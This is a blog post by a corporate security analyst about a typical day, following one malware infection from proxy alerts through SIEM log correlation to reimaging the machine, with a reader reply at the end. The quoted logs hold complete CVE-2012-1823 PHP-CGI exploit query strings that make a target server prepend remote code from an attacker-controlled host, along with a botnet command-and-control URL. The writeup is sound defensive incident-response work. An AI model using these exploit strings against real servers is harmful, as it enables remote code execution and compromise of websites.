What do you do all day?

That’s often the question I get asked by friends and family, and to be honest it’s hard to explain to non-techies so I figured I’d pick out a recent example of a typical malware find and cleanup at work and blog about it.
So it all started in the morning when I opened the daily report I email to myself from the proxy server that flags URL requests in categories I feel are malicious and accessed during the previous 24hrs.  Once blowing past the usual false positives one stood out to me, music.gr (TLD for Greece).  The report does not give full HTTP headers just the hostname so I had to look up the same hit in the proxy’s reporting server to get the time/date/username of the HTTP request.  Then I moved to the SIEM (log manager) to get correlated logs from FWs, netflow, and the parsed raw proxy logs showing all the fields with a start and end time +/- 5 mins.
In doing so I saw obvious bad outbound traffic from the suspect host with what looked like URLs centered around webmail.  This is not surprising as webmail is a significant weak spot in many  corporations, anyway here are some of the logs I was presented with, a bit sanitized.


hxxp://music.gr/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://lutom.gov.uk/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://csauk.com/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://krasguatanany.ru/gley/index.php?r=gate&id=18fcfe64&group=01.06.2012&debug=0
The long URLs looked interesting and familiar to me, and then I remembered they looked similar the logs one of the isc.sans.org handlers posted about HERE.  They are attempts to exploit PHP vuln CVE-2012-1823 by rewriting the php configuration and making the server append certainly malicious code at the hxxp://81.17.24.83/info3.txt to the site’s index.html.  I was able to get the malicious code from the link using Malzilla even days later as I write this.  That code looked like this

echo(“830ad4ea3b311795d5a615b9e5fdbb9a”);

This appears to be a short base64 encoded string. When decoded it was non-printable in ASCII.   I’m not sure what’s its purpose is, perhaps it was just a way to mark servers that have been exploited successfully or further obfuscated with a key of some sorts.  I found this Snort blog post about the topic  they had a good idea to just switch to info2.txt which had a more expected code to inject, the c99 shell.
Anyway this client was attempting to attack other internet servers through my company’s network.  So that’s not good!  Also the krasguatanany.ru looks like a funky URL and it turned out to be C2 (command and control) attempts.
At this point I called the user and asked him to disconnect from the network, opened a helpdesk case, asked desktop support to bring me the computer and started taking a forensics image of the drive.  This was more for practice and to mess around with later as I didn’t believe this was more than just “mass-malware” or common bot infection that was a targeted attack.  The machine was scanned with several anti-malware tools and cleaned to my satisfaction, finding some Trojan’s and random obfuscated files.

Advertisements

2 thoughts on “What do you do all day?

    • Hi afreak, Thanks for the comment. You make a good point saying it’s an MD5 hash as opposed to a base64 string. To be honest since they were just echoing it I assumed some kind of encoding of plain text that would only make sense to them and then base64 was my first bet since it does format correctly. Although looking at it again it seems very unlikely a base64 string that long would not have letters higher than F. Guess I need more practice staring at unknown formatted text. Do you have any tricks you’d like to share on good ways to detect base64 when = / or + are not included? I’ve used case sensitivity as a clue in the past but didn’t want to “trust” this text as it could be meant to deceive.

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s